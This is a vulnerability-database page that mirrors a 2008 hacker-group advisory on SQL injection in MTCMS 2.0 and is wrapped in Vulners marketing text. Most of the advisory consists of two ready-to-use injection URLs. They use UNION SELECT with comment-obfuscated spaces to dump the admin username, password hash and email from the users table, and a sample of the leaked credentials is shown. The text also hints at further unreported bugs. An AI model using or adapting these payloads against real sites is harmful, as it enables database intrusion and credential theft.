Lucene search

mtcms-sql.txt

🗓️ 10 Jan 2008 00:00:00Reported by virangar security teamType

packetstorm🔗 packetstormsecurity.com👁 14 Views

MTCMS 2.0 SQL Injection Vulnerability in patch and downloads function

5 of 5AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

`#######################################################################  
# #  
# ...:::::MTCMS <=2.0 SQL Injection Vulnerbility ::::.... #   
#######################################################################  
  
Virangar Security Team  
  
www.virangar.org  
www.virangar.net  
  
--------  
Discoverd By :hadihadi  
  
special tnx to:MR.nosrati,black.shadowes,MR.hesy,Zahra  
  
& all virangar members & all iranian hackerz  
  
greetz:to my best friend in the world hadi_aryaie2004  
----------  
vules:  
http://site.com/patch/?a='/**/union/**/select/**/1,concat(0x23,username,0x5f,password,0x23),email,4,5,6,7/**/from/**/users/**/where/**/id=1/*  
http://site.com/patch/?a=downloads&cid='/**/union/**/select/**/1,concat(0x23,username,0x5f,password,0x23),email,4,5,6,7/**/from/**/users/**/where/**/id=1/*  
  
-------------------------------------  
you can see some thing similar to:  
#admin_35a6e23edefc651ef0380b277ce5d709#  
[email protected]  
-------------------------------------  
MTCMS contains of other bugs in other pages ;)  
& maybe other versions have Vulnerbility too :)  
  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo

10 Jan 2008 00:00Current

7.4High risk

Vulners AI Score7.4